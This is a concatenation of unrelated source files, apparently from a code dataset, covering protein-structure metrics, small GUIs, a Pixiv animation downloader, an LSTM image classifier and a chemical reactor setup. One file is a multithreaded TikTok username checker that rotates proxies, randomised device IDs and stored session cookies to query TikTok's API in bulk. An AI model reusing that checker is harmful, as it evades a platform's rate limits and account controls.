mask.ndim == actual_coords.ndim - 1\r\n\r\n if align:\r\n _, actual_coords = kabsch_align(align_to=predicted_coords, align_from=actual_coords, mask=mask)\r\n\r\n tmp = torch.sum(fn(predicted_coords - actual_coords), dim=-1)\r\n mean_error = masked_mean(tmp, mask, dim=-1)\r\n return mean_error\r\n\r\n\r\ndef compute_coord_rmsd(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n atom_mask: Optional[Tensor] = None,\r\n per_res: bool = False,\r\n align: bool = True,\r\n) -> Tensor:\r\n \"\"\"Computes RMSD between predicted and actual coordinates\r\n\r\n :param predicted_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param actual_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param atom_mask: mask tensor of shape (...,n,a) if per_res is specified\r\n otherwise (...,n)\r\n :param per_res: whether to return deviation for each residue,\r\n or for the entire structure.\r\n :param align: whether to kabsch align coordinates before computing rmsd\r\n :return: RMSD\r\n \"\"\"\r\n mse = mean_aligned_error(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n mask=atom_mask,\r\n fn=torch.square,\r\n per_residue=per_res,\r\n align=align,\r\n )\r\n return torch.sqrt(mse)\r\n\r\n\r\ndef compute_coord_mae(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n atom_mask: Optional[Tensor],\r\n per_res: bool = True\r\n) -> Tensor:\r\n \"\"\"Computes mean l1 deviatoin between predicted and actual coordinates\r\n\r\n :param predicted_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is number of atom types\r\n :param actual_coords: tensor of shape (...,n,a,3) if per_res\r\n is specified, otherwise (...,n,3) - where a is 
number of atom types\r\n    :param atom_mask: mask tensor of shape (...,n,a) if per_res is specified\r\n    otherwise (...,n)\r\n    :param per_res: whether to return deviation for each residue,\r\n    or for the entire structure.\r\n    :param align: whether to kabsch align coordinates before computing rmsd\r\n    :return: RMSD\r\n    \"\"\"\r\n    mse = mean_aligned_error(\r\n        predicted_coords=predicted_coords,\r\n        actual_coords=actual_coords,\r\n        mask=atom_mask,\r\n        fn=torch.square,\r\n        per_residue=per_res,\r\n        align=align,\r\n    )\r\n    return torch.sqrt(mse)\r\n\r\n\r\ndef compute_coord_mae(\r\n        predicted_coords: Tensor,\r\n        actual_coords: Tensor,\r\n        atom_mask: Optional[Tensor],\r\n        per_res: bool = True\r\n) -> Tensor:\r\n    \"\"\"Computes mean l1 deviation between predicted and actual coordinates\r\n\r\n    :param predicted_coords: tensor of shape (...,n,a,3) if per_res\r\n    is specified, otherwise (...,n,3) - where a is number of atom types\r\n    :param actual_coords: tensor of shape (...,n,a,3) if per_res\r\n    is specified, otherwise (...,n,3) - where a is number of atom types\r\n    :param atom_mask: mask tensor of shape (...,n,a) if per_res is specified\r\n    otherwise (...,n)\r\n    :param per_res: whether to return deviation for each residue,\r\n    or for the entire structure.\r\n    :return: Mean l1 coordinate deviation\r\n    \"\"\"\r\n    # reshape so that each set of coords has batch dimension\r\n    return mean_aligned_error(\r\n        predicted_coords=predicted_coords,\r\n        actual_coords=actual_coords,\r\n        mask=atom_mask,\r\n        fn=lambda x: torch.sqrt(torch.square(x) + get_eps(x)),\r\n        per_residue=per_res\r\n    )\r\n\r\n\r\ndef per_residue_neighbor_counts(atom_coords: Tensor, mask: Optional[Tensor] = None, dist_cutoff=10):\r\n    \"\"\"Computes the number of coordinates within a dist_cutoff radius of each input coordinate\r\n    :param atom_coords: Tensor of shape (...,n,3).\r\n    :param mask: ignore coordinate i if mask[...,i] is False (optional)\r\n    :param dist_cutoff: cutoff distance for two coordinates to be considered neighbors\r\n    :return: number of neighbors per atom\r\n    \"\"\"\r\n    batched = atom_coords.ndim == 3\r\n    rel_dists = torch.cdist(atom_coords, atom_coords)\r\n    dist_mask = torch.einsum(\"... n, ... m-> ... nm\", mask, mask) if exists(mask) else \\\r\n        torch.ones(1, device=atom_coords.device).bool()\r\n    exclude_self_mask = torch.eye(atom_coords.shape[-2], device=atom_coords.device)\r\n    mask = torch.logical_and(dist_mask, exclude_self_mask.unsqueeze(0) if batched else exclude_self_mask)\r\n    rel_dists[mask] = dist_cutoff + 1\r\n    return torch.sum((rel_dists < dist_cutoff), dim=-1)  # noqa\r\n\r\n\r\ndef compute_angle_mae(source: Tensor, target: Tensor) -> Tensor:\r\n    \"\"\"computes absolute error between two lists of angles\"\"\"\r\n    a = source - target\r\n    a[a > PI] -= 2 * PI\r\n    a[a < -PI] += 2 * PI\r\n    return torch.abs(a)\r\n\r\n\r\ndef calculate_sequence_identity(pred_seq: Tensor, target_seq: Tensor) -> Tensor:\r\n    \"\"\"Calculate average sequence identity between pred_seq and target_seq\"\"\"\r\n    return torch.mean((pred_seq == target_seq).float())\r\n\r\n\r\ndef detect_disulfide_bond_pairs(target_seq: Tensor, target_coords: Tensor) -> List[Tuple[int, int]]:\r\n    \"\"\"Returns Cysteine pairs forming disulfide bonds\"\"\"\r\n    # calculate cystine positions\r\n    cys_posns = torch.arange(target_seq.numel())[target_seq == AA_INDEX_MAP[\"CYS\"]]\r\n    SG = ALL_ATOM_POSNS[\"SG\"]\r\n    is_bond = lambda p1, p2: torch.norm(target_coords[p1, SG] - target_coords[p2, SG]) < 2.5\r\n    return list(filter(lambda x: is_bond(*x), combinations(tensor_to_list(cys_posns), 2)))\r\n\r\n\r\ndef calculate_average_entropy(pred_aa_logits: Tensor):\r\n    \"\"\"Calculate Average Entropy\"\"\"\r\n    log_probs = torch.log_softmax(pred_aa_logits, dim=-1)\r\n    probs = torch.exp(log_probs)\r\n    return torch.mean(torch.sum(-probs * (log_probs * math.log2(math.e)), dim=-1))  # entropy\r\n\r\n\r\ndef calculate_perplexity(pred_aa_logits: Tensor, true_labels: Tensor):\r\n    \"\"\"Calculate Perplexity\"\"\"\r\n    ce = torch.nn.CrossEntropyLoss()\r\n    return torch.exp(ce(pred_aa_logits, true_labels))\r\n\r\n\r\ndef calculate_unnormalized_confusion(pred_labels: Tensor, true_labels: Tensor):\r\n    \"\"\"Calculate (un-normalized) confusion\"\"\"\r\n    pred_one_hot, target_one_hot = map(lambda x: torch.nn.functional.one_hot(x, 21), (pred_labels, true_labels))\r\n    return torch.einsum(\"n i, n j -> i j\", pred_one_hot.float(), target_one_hot.float())\r\n\r\n\r\ndef get_percentage_contacts(\r\n        a: Tensor,\r\n        b: Tensor,\r\n        min_sep: int,\r\n        max_sep: int,\r\n        threshold: float = 8,\r\n        pair_mask: Optional[Tensor] = 
None,\r\n):\r\n    \"\"\"Get percentage of contacts in a that are common to b\r\n\r\n    :param a: tensor of coordinates having shape (n,3) or (b,n,3)\r\n    :param b: tensor of coordinates having shape (n,3) or (b,n,3)\r\n    :param min_sep: minimum sequence separation to consider\r\n    :param max_sep: maximum sequence separation to consider (use -1 to exclude cutoff)\r\n    :param threshold: distance cutoff threshold for which two residues are considered\r\n    to be in contact (i.e. if d_ij < threshold)\r\n    :param pair_mask: optional mask over residue pairs to include\r\n    \"\"\"\r\n    a = a if a.ndim == 3 else a.unsqueeze(0)\r\n    b = b if b.ndim == 3 else b.unsqueeze(0)\r\n    a_dists, b_dists = torch.cdist(a, a), torch.cdist(b, b)\r\n    sep_mask = get_sep_mask(a.shape[1], min_sep=min_sep, max_sep=max_sep, device=a.device)\r\n    a_contacts = torch.logical_and(a_dists < threshold, sep_mask)\r\n    b_contacts = torch.logical_and(b_dists < threshold, sep_mask)\r\n    if exists(pair_mask):\r\n        a_contacts = torch.logical_and(a_contacts, pair_mask)\r\n        b_contacts = torch.logical_and(b_contacts, pair_mask)\r\n    eps = get_eps(a_dists)\r\n    common = torch.logical_and(a_contacts, b_contacts).float().sum()\r\n    return common / (eps + a_contacts.float().sum())\r\n\r\n\r\ndef compute_dist_deviation(\r\n        predicted_coords: Tensor,\r\n        actual_coords: Tensor,\r\n        min_sep: int,\r\n        max_sep: int,\r\n) -> Tensor:\r\n    \"\"\"Average L1-difference between predicted and actual coordinates\"\"\"\r\n    _, actual_coords, predicted_coords = batch_coords(\r\n        predicted_coords=predicted_coords,\r\n        actual_coords=actual_coords,\r\n        batched_len=3,\r\n    )\r\n    a, b = map(lambda x: torch.cdist(x, x), (actual_coords, predicted_coords))\r\n    sep_mask = get_sep_mask(a.shape[1], min_sep=min_sep, max_sep=max_sep, device=a.device)\r\n\r\n    return torch.mean(torch.abs(a - b)[sep_mask])\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/assessment/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":18299,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"20046388800","text":"from tkinter import *\nfrom functools import partial  # To prevent unwanted windows\nimport random\n\nclass Start:\n    def __init__(self, partner):\n\n        self.start_frame = Frame(padx=10, pady=10)\n        self.start_frame.grid()\n\n        # Math Quiz Game Heading (row 0)\n        self.math_quiz_label = Label(self.start_frame, text=\"Math Quiz Game\",\n                                     font=\"Arial 19 bold\")\n        self.math_quiz_label.grid(row=1)\n\n        # Help button (row 2)\n        self.help_button = Button(self.start_frame, text=\"Help/Rules\",\n                                  command=self.to_quiz)\n        self.help_button.grid(row=2, pady=10)\n\n    def to_quiz(self):\n        get_help = Help(self)\n\nclass Help:\n    def __init__(self, partner):\n\n        # Disable help button\n        partner.help_button.config(state=DISABLED)\n\n        # Help Quiz\n        self.help_quiz =Toplevel()\n\n        # If users press cross at top, closes help and 'releases' help button\n        self.help_quiz.protocol('WM_DELETE_WINDOW', partial(self.close_help, partner))\n\n        # Gui Frame\n        self.help_frame = Frame(self.help_quiz, width=300)\n        self.help_frame.grid()\n\n        # Help Heading (row 0)\n        self.how_heading = Label(self.help_frame, text=\"Help / Rules\",\n                                 font=\"Arial 14 bold\")\n        self.how_heading.grid(row=0)\n\n        help_text=\"Choose a number of questions from 1 to 10, then \" \\\n                  \"choose a level that will be suitable for you. \\\n\\\n \" \\\n                  \"The levels are Easy, Medium and Hard. Easy will contain plus and \" \\\n                  \"minus, Medium will contain only multiplication, and lastly Hard \" \\\n                  \"will contain division and higher numbers that can make it \" \\\n                  \"complicated for some users. 
\" \\\n\n # Help text (row 1)\n self.help_text = Label(self.help_frame, text=help_text,\n justify=LEFT, wrap=400, padx=10, pady=10)\n self.help_text.grid(row=1)\n\n # Dismiss button (row 2)\n self.dismiss_btn = Button(self.help_frame, text=\"Dismiss\",\n width=10, font=\"Arial 15 bold\", bg=\"maroon\",\n command=partial(self.close_help, partner))\n self.dismiss_btn.grid(row=2, pady=10)\n\n def close_help(self, partner):\n partner.help_button.config(state=NORMAL)\n self.help_quiz.destroy()\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Math Quiz\")\n something = Start(root)\n root.mainloop()","repo_name":"martin1144/03_Math_Quiz_Game","sub_path":"Help_GUI_v1.py","file_name":"Help_GUI_v1.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38525499822","text":"import math\n\nimport PySimpleGUI as sg\n\n\ndef get_layout(text):\n returns = text.count('\\n')\n if returns == 0:\n layout = [[sg.Text(text, size=(50, math.ceil(len(text) / 50)))],\n [sg.CloseButton('Ok')]]\n else:\n layout = [[sg.Text(text, size=(50, math.floor(len(text) / 50) + returns))],\n [sg.CloseButton('Ok')]]\n return layout\n\n\ndef show_error_window(text, location=(600, 100)):\n layout = get_layout(text)\n error_window = sg.Window('Error', layout=layout, element_justification='c', finalize=True,\n location=(location[0], location[1]))\n\n error_window.read()\n\n\ndef show_help_window(text, location=(600, 100)):\n layout = get_layout(text)\n help_window = sg.Window('Help', layout=layout, element_justification='c', finalize=True,\n location=(location[0], location[1]))\n\n help_window.read()\n","repo_name":"robinfaber97/NetLogoDOE","sub_path":"NetLogoDOE/src/gui/custom_windows.py","file_name":"custom_windows.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37892037106","text":"#!/bin/usr/env python\n\nimport argparse\nimport json\nimport os\nimport re\nimport shlex\nimport subprocess\nimport sys\nimport tempfile\nimport urllib.request\nimport zipfile\n\n\ndef get_ugoira_frames(pixiv_id, output_path, verbose=False):\n base_pixiv_url = f'https://www.pixiv.net/en/artworks/{pixiv_id}'\n meta_pixiv_url = f'https://www.pixiv.net/ajax/illust/{pixiv_id}/ugoira_meta'\n user_agent = 'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0'\n\n verbose_print(verbose, f'Fetching URL \"{meta_pixiv_url}\"')\n ugoira_json = None\n\n req = urllib.request.Request(meta_pixiv_url)\n req.add_header('Referer', base_pixiv_url)\n req.add_header('User-Agent', user_agent)\n req.add_header('Accept', 'application/json')\n\n with urllib.request.urlopen(req) as res:\n res_text = res.read().decode('utf-8')\n\n try:\n ugoira_json = json.loads(res_text)\n except json.decoder.JSONDecodeError:\n return False\n\n req = urllib.request.Request(ugoira_json['body']['originalSrc'])\n req.add_header('Referer', base_pixiv_url)\n req.add_header('User-Agent', user_agent)\n\n ugoira_zipfile = os.path.join(tempfile.gettempdir(), f'ugoira_{pixiv_id}.zip')\n chunk_size = 4 * 1024\n\n with urllib.request.urlopen(req) as res, open(ugoira_zipfile, 'wb') as out_file:\n while True:\n chunk = res.read(chunk_size)\n if chunk:\n out_file.write(chunk)\n else:\n break\n\n verbose_print(verbose, 'Extracting ugoira zip file')\n with zipfile.ZipFile(ugoira_zipfile, 'r') as zip_ref:\n zip_ref.extractall(output_path)\n\n 
verbose_print(verbose, 'Deleting ugoira zip file')\n os.remove(ugoira_zipfile)\n\n verbose_print(verbose, 'Creating FFmpeg concat demuxer file')\n\n # https://superuser.com/questions/617392/ffmpeg-image-sequence-with-various-durations\n ffconcat_file = os.path.join(output_path, 'ffconcat.txt')\n with open(ffconcat_file, 'w') as out_file:\n out_file.write('ffconcat version 1.0\\n\\n')\n\n # https://video.stackexchange.com/questions/20588/ffmpeg-flash-frames-last-still-image-in-concat-sequence\n ugoira_frames = ugoira_json['body']['frames'].copy()\n last_frame = ugoira_frames[-1].copy()\n last_frame['delay'] = 1\n ugoira_frames.append(last_frame)\n\n for frame in ugoira_frames:\n frame_file = frame['file']\n frame_duration = frame['delay'] / 1000\n frame_duration = round(frame_duration, 4)\n\n out_file.write(\n f'file {frame_file}\\n'\n f'duration {frame_duration}\\n\\n'\n )\n\n is_process_success = True\n verbose_print(verbose, 'Get ugoira frames done')\n\n return True\n\n\ndef convert_ugoira_frames(frames_path, video_output, ffmpeg_path, ffmpeg_args, interpolate=False, verbose=False):\n interpolate_arg = '-filter:v \"minterpolate=\\'fps=60\\'\"'\n if not interpolate:\n interpolate_arg = ''\n\n call_str = (\n f'\"{ffmpeg_path}\" -hide_banner -y '\n '-i ffconcat.txt '\n f'{interpolate_arg} '\n f'{ffmpeg_args} '\n f'\"{video_output}\" '\n )\n call_stack = shlex.split(call_str)\n\n verbose_print(verbose, f'Running FFmpeg with argument: \\n{call_str}')\n\n subprocess.call(\n call_stack,\n cwd=os.path.abspath(frames_path),\n )\n\n verbose_print(verbose, 'Convert ugoira frames done')\n\n\ndef verbose_print(verbose, message):\n if verbose:\n print(message)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=(\n 'Python script to download and convert an ugoira animation on '\n 'Pixiv, and convert it to a video via FFmpeg.'\n )\n )\n parser.add_argument(\n '--pixiv_id', type=int, required=False,\n help=(\n 'The pixiv ID for the ugoira illustration. Required if the '\n '--process argument is \"all\" or \"getframes\".'\n ),\n )\n parser.add_argument(\n '--frames_path', type=str, required=False,\n help=(\n 'The path to where the image frames and ffconcat.txt is. Required '\n 'if the --process argument is \"convertframes\".'\n ),\n )\n\n process_choices = ('all', 'getframes', 'convertframes', )\n parser.add_argument(\n '--process', type=str, required=False, default='all',\n choices=process_choices,\n help=(\n 'The process that should take place. \"all\" will execute both '\n '\"getframes\" and \"convertframes\". \"getframes\" will only obtain the '\n 'ugoira frames, and generate a FFmpeg concat demuxer file. '\n '\"convertframes\" will only convert the ugoira frames into a video '\n 'type of your choice through FFmpeg.'\n ),\n )\n\n parser.add_argument(\n '--video_output', type=str, required=False, default='output.webm',\n help=(\n 'The output filename for the converted video. Defaults to '\n '\"output.webm\".'\n ),\n )\n parser.add_argument(\n '--interpolate', action='store_true',\n help=(\n 'Attempts to interpolate the frames to 60 frames per second. Note, '\n 'it only works well with some ugoira, and would take a longer time '\n 'to finish conversion. Use with care.'\n ),\n )\n parser.add_argument(\n '--ffmpeg_path', type=str, required=False, default='ffmpeg',\n help='The path to the FFmpeg executable.',\n )\n parser.add_argument(\n '--ffmpeg_args', type=str, required=False,\n default='-c:v libvpx -crf 10 -b:v 2M -an',\n help=(\n 'The arguments for FFmpeg. 
Defaults to '\n '\"-c:v libvpx -crf 10 -b:v 2M -an\", which is VP8 WEBM with a '\n 'variable bitrate of 2 MBit/s, with no audio.'\n ),\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true',\n help='Forces the system to print out verbose process messages.',\n )\n\n args = parser.parse_args()\n msg_required = 'the following arguments are required:'\n\n if args.process in ('all', 'getframes', ) and not args.pixiv_id:\n parser.error(f'{msg_required} --pixiv_id')\n\n if args.process == 'convertframes' and not args.frames_path:\n parser.error(f'{msg_required} --frames_path')\n\n return args\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n exec_path = os.path.dirname(sys.argv[0])\n ugoira_path = None\n\n if args.process in ('all', 'getframes', ):\n ugoira_path = os.path.join(exec_path, f'ugoira_{args.pixiv_id}')\n is_success = get_ugoira_frames(\n args.pixiv_id,\n ugoira_path,\n args.verbose,\n )\n\n if not is_success:\n print(f'Unable to get ugoira data for ID {args.pixiv_id}')\n sys.exit(1)\n\n if args.process in ('all', 'convertframes', ):\n if ugoira_path is None:\n ugoira_path = args.frames_path\n\n convert_ugoira_frames(\n ugoira_path,\n args.video_output,\n args.ffmpeg_path,\n args.ffmpeg_args,\n args.interpolate,\n args.verbose,\n )\n","repo_name":"altbdoor/py-ugoira","sub_path":"py_ugoira.py","file_name":"py_ugoira.py","file_ext":"py","file_size_in_byte":7172,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"22007049016","text":"import pytest\n\nfrom pyaides.functools import retries\n\n\nclass TestDecorrelatedJitter:\n def test_basic(self):\n state = {\"called\": 0}\n\n @retries.decorrelated_jitter(3)\n def g():\n state[\"called\"] += 1\n return state\n\n assert g()[\"called\"] == 1\n assert g()[\"called\"] == 2\n\n def test_max_retry_error(self):\n state = {\"called\": 0}\n\n @retries.decorrelated_jitter(2, cap=0.5, base=0.1)\n def f():\n state[\"called\"] += 1\n raise ValueError(\"bomb\")\n\n with pytest.raises(ValueError) as exc:\n f()\n assert str(exc.value) == \"bomb\"\n assert state[\"called\"] == 2\n","repo_name":"okomestudio/pyaides","sub_path":"tests/pyaides/functools/test_retries.py","file_name":"test_retries.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27554657539","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom skimage import io\nimport os\nimport cv2\n\nfrom keras import Sequential\nfrom keras.layers import Dense, LSTM\n\nfrom gradientsHOG import returnHOG\n\n# global variables\nBLOCK_SIZE = 64\ntestSplit = 0.80\n\n# X stores input for training, y stores result (0 or 1)\nX = []\ny = []\nX_train = []\nX_test = []\ny_train = []\ny_test = []\nmodel = Sequential()\n\n# set up data to train and test on\ndef dataSetup():\n print('setup')\n # python 3\n # directory = os.fsencode('./images')\n\n filename = './images/basicRiver.jpg'\n # for filename in os.listdir('./images'):\n for i in range(0, 1):\n # python3\n # filename = os.fsdecode(file)\n # python2\n image = io.imread(filename, as_gray=True)\n\n for i in range(0, len(image[0]), BLOCK_SIZE):\n for j in range(0, len(image), BLOCK_SIZE):\n\n # j is row i is column\n\n # get subimage that is BLOCK_SIZE x BLOCK_SIZE\n imageTmp = image.copy()\n if (i + BLOCK_SIZE > len(image[0]) and j + BLOCK_SIZE > len(image)):\n subimage = image[len(image) - BLOCK_SIZE:len(image), len(image[0]) - 
BLOCK_SIZE:len(image[0])]\n cv2.rectangle(imageTmp, (len(image[0]) - BLOCK_SIZE, len(image) - BLOCK_SIZE), (len(image[0]), len(image)), (255, 255, 255), 2)\n elif (i + BLOCK_SIZE > len(image[0])):\n subimage = image[j:j + BLOCK_SIZE, len(image[0]) - BLOCK_SIZE:len(image[0])]\n cv2.rectangle(imageTmp, (len(image[0]) - BLOCK_SIZE, j), (len(image[0]), j + BLOCK_SIZE), (255, 255, 255), 2)\n elif (j + BLOCK_SIZE > len(image)):\n subimage = image[len(image) - BLOCK_SIZE:len(image), i:i + BLOCK_SIZE]\n cv2.rectangle(imageTmp, (i, len(image) - BLOCK_SIZE), (i+BLOCK_SIZE, len(image)), (255, 255, 255), 2)\n else:\n subimage = image[j:j + BLOCK_SIZE, i:i + BLOCK_SIZE]\n cv2.rectangle(imageTmp, (i, j), (i+BLOCK_SIZE, j+BLOCK_SIZE), (255, 255, 255), 2)\n\n # get image features for block and store in X\n tmp = returnHOG(subimage)\n X.append(tmp)\n\n # ask for user input on whether or not has river to set y\n cv2.namedWindow('image')\n cv2.moveWindow('image', 200, 200)\n cv2.imshow('image', imageTmp)\n key = cv2.waitKey(0)\n # cv2.destroyAllWindows()\n y.append(int(chr(key)))\n\n # split up training and test data\n X_np = np.array(X)\n y_np = np.array(y)\n testSize = int(testSplit * len(X_np))\n X_train = X_np[:testSize]\n X_test = X_np[testSize:]\n y_train = y_np[:testSize]\n y_test = y_np[testSize:]\n\n # resize X so works with lstm\n X_train = X_train.reshape(X_train.shape[0], (BLOCK_SIZE**2)/2, 1)\n X_test = X_test.reshape(X_test.shape[0], (BLOCK_SIZE**2)/2, 1)\n X_np\n print('done setup')\n\n# implents machine learning\ndef trainOnFeatures():\n print('train')\n model.add(LSTM(units=30, return_sequences=True, input_shape=(X.shape[1], 1)))\n model.add(LSTM(units=30, return_sequences=True))\n model.add(LSTM(units=30))\n model.add(Dense(units=1))\n model.summary()\n\n model.compile(optimizer='adam', loss='mean_squared_error')\n\n model.fit(X, y, epochs=10, batch_size=32)\n print('done train')\n\ndef testModel():\n print('test')\n predicted_value = model.predict(X)\n\n print(predicted_value)\n print(y)\n\n print('done test')\n\ndef main():\n dataSetup()\n trainOnFeatures()\n testModel()\n\nif __name__ == \"__main__\":\n main()","repo_name":"meisenstat/ComputerVisionAssignments","sub_path":"AssignmentThree/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72913163893","text":"from tls_client import Session\nfrom urllib.parse import urlencode, quote\nfrom random import randint, choice\nfrom json import load, loads\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom os import name, system\nfrom time import sleep\nfrom threading import Thread, active_count\n\n\nclass Checker:\n def __init__(this, usernames: list, sessions: list, proxies: list) -> None:\n this.config = load(open(\"./bin/config.json\", \"r\"))\n this.usernames = usernames\n this.sessions = sessions\n this.proxies = proxies\n this.unavailable = 0\n this.available = 0\n this.fails = 0\n this.checked = 0\n this.rpm = 0\n this.rps = 0\n \n this.user_agent = r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'\n \n def sign(this, url: str, ua: str | None = None, host: str = 'localhost', port: int = 1337) -> str:\n ua = this.user_agent if not ua else ua\n \n with socket(AF_INET, SOCK_STREAM) as client:\n client.connect((host, port))\n client.sendall(f\"GET /?url={quote(url)}&user_agent={quote(ua)} HTTP/1.0\\r\\n\\r\\n\".encode())\n response = 
client.recv(2048)\n \n return loads(response.split(b'\\r\\n')[-1])['signed_url']\n \n def rps_rpm_thread(this) -> None:\n while True:\n before = this.checked\n sleep(2)\n this.rps = (this.checked - before) * 2\n this.rpm = this.rps * 60\n \n def title_thread(this) -> None:\n if name == 'nt':\n while True:\n system(\n f'title TikTok Checker @xtekky ^| c: {this.checked} f: {this.fails} a: {this.available} u: {this.unavailable}' + \n f' ^| rps: {this.rps} rpm: {this.rpm}'\n )\n \n sleep(0.01)\n \n def check(this, unique_id: str) -> None:\n for _ in range(this.config['retries']):\n try:\n client = Session(client_identifier='chrome_109')\n \n headers = {\n 'authority' : 'www.tiktok.com',\n 'accept' : '*/*',\n 'accept-language' : 'en,fr-FR;q=0.9,fr;q=0.8,es-ES;q=0.7,es;q=0.6,en-US;q=0.5,am;q=0.4,de;q=0.3',\n 'cookie' : f'tiktok_webapp_theme=light; sessionid={choice(this.sessions)}',\n 'referer' : f'https://www.tiktok.com/@{unique_id}',\n 'sec-ch-ua' : '\"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"',\n 'sec-ch-ua-mobile' : '?0',\n 'sec-ch-ua-platform': '\"Windows\"',\n 'sec-fetch-dest' : 'empty',\n 'sec-fetch-mode' : 'cors',\n 'sec-fetch-site' : 'same-origin',\n 'user-agent' : this.user_agent\n }\n \n params = urlencode({\n 'aid' :\t1988,\n 'app_language' :\t'en',\n 'app_name' :\t'tiktok_web',\n 'battery_info' :\t'0.6',\n 'browser_language' :\t'en',\n 'browser_name' :\t'Mozilla',\n 'browser_online' :\t'true',\n 'browser_platform' :\t'Win32',\n 'browser_version' :\t'5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',\n 'channel' :\t'tiktok_web',\n 'cookie_enabled' :\t'true',\n 'device_id' :\trandint(6999999999999999999, 7122222222222222222),\n 'device_platform' :\t'web_pc',\n 'focus_state' :\t'true',\n 'from_page' :\t'user',\n 'history_len' :\t'3',\n 'is_fullscreen' :\t'false',\n 'is_page_visible' :\t'true',\n 'os' :\t'windows',\n 'priority_region' :\t'FR',\n 'referer' :\t'',\n 'region' :\t'FR',\n \"screen_height\" : randint(777, 888),\n \"screen_width\" : randint(1333, 1666),\n 'tz_name' :\t'Europe/London',\n 'unique_id' :\tunique_id,\n 'webcast_language' :\t'en',\n })\n\n response = client.get(this.sign(f'https://www.tiktok.com/api/uniqueid/check/?{params}'), \n headers = headers, proxy = f'http://{choice(this.proxies)}', timeout=10).text.encode(); this.checked += 1\n \n if b'valid\":false' in response:\n print(f'res: {response}')\n this.unavailable += 1\n \n elif b'valid\":true' in response:\n print(f'res: {response}')\n this.available += 1\n \n else:\n this.fails += 1\n\n return\n \n except Exception as e:\n print(e)\n this.fails += 1\n \n def test(this):\n Thread(target=this.rps_rpm_thread).start()\n Thread(target=this.title_thread).start()\n \n while True:\n if active_count() < this.config['threads']:\n Thread(target=this.check, args=['uniqwfweewue_id']).start()\n\nif __name__ == '__main__':\n usernames = open(\"./bin/usernames.txt\", \"r\").read().splitlines()\n sessions = open(\"./bin/sessions.txt\", \"r\").read().splitlines()\n proxies = open(\"./bin/proxies.txt\", \"r\").read().splitlines()\n \n Checker(usernames, sessions, proxies).test()","repo_name":"xtekky/TikTok-Checker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"21"} +{"seq_id":"43532248785","text":"import random\r\nimport sys\r\n\r\nsf = open(sys.argv[1])\r\ntf = open(sys.argv[2])\r\nof = open(sys.argv[3], 
mode='w')\r\nnumLines = 0\r\nwhile True:\r\n\trandomNum = random.uniform(0,1)\r\n\tif randomNum < 0.5:\r\n\t\tsl = sf.readline()\r\n\t\tif not sl:\r\n\t\t\tbreak\r\n\t\tof.write(sl)\r\n\telse:\r\n\t\ttl = tf.readline()\r\n\t\tif not tl:\r\n\t\t\tbreak\r\n\t\tof.write(tl)\r\n\tnumLines += 1\r\n\tif numLines % 1000 == 0:\r\n\t\tprint(\"Process Lines: \", numLines)\r\nfor line in sf:\r\n\tof.write(line)\r\nfor line in tf:\r\n\tof.write(line)\r\nsf.close()\r\ntf.close()\r\nof.close()\r\n","repo_name":"Ivsucram/ACDC","sub_path":"FUSION/scripts/CombineStreams.py","file_name":"CombineStreams.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11012822734","text":"from asali.reactors.het1d import Heterogeneous1DReactor\n\n\ndef main(cantera_input_file, gas_phase_name, surface_phase_name):\n h = Heterogeneous1DReactor(cantera_input_file, gas_phase_name, surface_phase_name)\n h.set_length([0, 0.001, 0.025, 0.05, 0.1, 0.15, 0.2, 0.6, 0.65, 1.0, 1.5, 2.0], 'm')\n h.set_pressure(5, 'bar')\n h.set_catalytic_load(10, '1/m')\n h.set_volumetric_flow_rate(15., 'm3/h')\n h.set_inlet_temperature(250, 'degC')\n h.set_inlet_mass_fraction({'O2': 0.4, 'AR': 0.5, 'H2': 0.1})\n h.set_initial_coverage({'Rh(s)': 1})\n h.set_solid_density(2300, 'kg/m3')\n h.set_solid_specific_heat(750, 'J/kg/degK')\n h.set_solid_thermal_conductivity(2.5, 'W/m/degK')\n h.set_initial_solid_temperature(250, 'degC')\n h.set_energy(True)\n h.set_gas_diffusion(False)\n h.set_verbosity(False)\n h.set_resolution_method(\"STEADYSTATE\")\n h.set_packed_bed_reactor(0.3, 'mm', 1, 'cm', 0.75)\n return 